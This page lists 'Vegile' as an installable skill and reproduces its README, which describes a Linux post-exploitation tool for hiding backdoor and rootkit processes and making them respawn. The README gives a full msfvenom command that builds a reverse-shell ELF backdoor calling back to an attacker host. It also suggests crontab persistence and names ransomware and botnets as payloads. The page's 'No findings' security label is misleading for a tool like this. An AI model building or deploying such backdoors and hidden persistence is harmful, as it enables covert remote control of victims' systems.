SkillAgentSearch skills...

Vegile

This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell

Install / Use

/learn @Exploit-install/Vegile
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

Vegile - Ghost In The Shell

Version Stage Build

Vegile is a tool for Post exploitation Techniquesin linux. Post Exploitation techniques will ensure that we maintain some level of access and can potentially lead to deeper footholds into our targets trusted network.

<img src="https://user-images.githubusercontent.com/17976841/34869598-fd7cf00e-f7b9-11e7-950e-a4cb61364c03.png" ></img>

Donate

  • If this project very help you to penetration testing and u want support me , you can give me a cup of coffee :)
  • Donation

:book: How it works

This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell

READ THIS

  • right now i just tested backdoor with msfvenom command using reverse_shell and my manual backdoor for linux [ its work ] or you can use thefatrat for help you creating a simple backdoor
  • msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR
  • for hidden process you can use for rootkits,backdoor,ransom and botnet { sh,python,perl,exe and binary }.
  • Victim target all linux distribution include ( base32 and base64 in their system )
  • For get persistence you can use crontab and xinit.d into your backdoor
  • this just simple algorithma how we can maintain our sessions and backdoor/rootkits , you can explore this

Getting Started

  1. git clone https://github.com/Screetsec/Vegile.git
  2. cd Vegile
  3. chmod +x Vegile

Using Vegile

Running Vegile without any parameters will give a helpful list of the most common options. you can use command :

  • Vegile -i / --inject [backdoor/rootkit]
  • Vegile -u / --unlimited [backdoor/rootkit]
  • Vegile -h / --help

Demo Video

  • Vegile demo

  • Vegile demo

:octocat: Credits

  • Thanks to allah
  • Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
  • Bash.ID , WingkoColi , Reversing ID , IndoXploit , Backbox Indonesia , Depok Cyber Security and Indonesia Backtrack Team .
  • Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
  • http://www.kali.org/ Kali Linux
  • gianlucaborello to give a reference and some idea [ https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/ ]
  • And another open sources tool in github

Disclaimer

Note: modifications, changes, or alterations to this sourcecode is acceptable, however,any public releases utilizing this code must be approved by writen this tool ( Edo -m- ).

View on GitHub
GitHub Stars23
CategoryDevelopment
Updated1mo ago
Forks11

Languages

Shell

Security Score

75/100

Audited on Feb 16, 2026

No findings